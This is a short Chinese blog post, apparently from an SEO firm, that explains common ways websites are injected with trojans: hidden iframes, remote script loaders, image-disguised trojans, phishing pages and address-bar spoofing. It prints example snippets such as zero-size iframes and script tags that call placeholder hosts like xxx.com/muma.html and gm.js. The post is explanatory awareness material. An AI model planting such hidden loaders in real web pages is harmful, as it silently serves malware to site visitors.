前段时间公司优化项目中出现了几个网站被挂马的情况,所以SEO研究院就针对于挂马进行了研究,网站挂马常见的几种代码类型如下:
1、框架嵌入式网页挂马
框架嵌入式网页挂马是最早也是早有效的一种网络挂马技术,它是挂马者利用iframe语句,加载到任意网页中都可执行的挂马形式。通常的代码形式如下:
<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>
在打开插入该句代码的网页后,同时也就打开了http://www.xxx.com/muma.html这个页面,但是由于这个页面的长和宽都是“0”,所以很难被察觉到,极其隐蔽。
2、JS调用型网页挂马
JS调用型网页挂马是利用JS脚本文件调用的原理进行的网页木马隐蔽挂马技术,例如黑客制作了一个.JS的文件,然后就利用这个JS代码调用挂马的网页。通常的代码形式如下:
<script language=javascript src=http://www.xxx.com/gm.js></script>
http://www.xxx.com/gm.js这就是JS的脚本文件,通过它可以调用和执行木马的服务端。这些JS文件一般都是可以通过工具生成的,黑客只需要输入相关的选项就可以了。
3、图片伪装挂马
黑客们为了逃避杀毒监视就生产了一种新的技术――图片木马,如下面的这段代码
<html>
<iframe src="http://www.xxx.com/test.htm" height=0 width=0></iframe>
<img src="http://www.xxx.com/test.jpg">
</html>
攻击者将http://www.xxx.com/test.htm中的木马代码植入到了test.jpg图片文件中,这些嵌入代码的图片也都可以使用工具生成,黑客们只需要输入相关的选项就可以了。
4、网络钓鱼挂马
网络钓鱼挂马又称伪装调用挂马,是互联网中最常见的一种欺骗手段。它是黑客利用人们的好奇心、贪心等心理制作的一个伪装链接或网页。它利用社会工程学的欺骗方法,引诱用户点击,当用户打开一个看似正常的页面时,网页代码随之运行。
这种方式的隐蔽性极高,它往往是欺骗用户输入某些个人隐私信息,窃取个人隐私。如下图就是一个网络钓鱼网站,表面看起来没有异常,但是你看域名就会发现问题了。
5、伪装挂马
这是一种高级的欺骗挂马,是黑客利用IE或者是Fixfox浏览器的设计缺陷制造的一种高级欺骗技术,当用户访问木马页面时地址栏的是www.sina.com等用户信任的地址,但是其实打开了被挂马的页面,从而实现欺骗。
新闻热点
疑难解答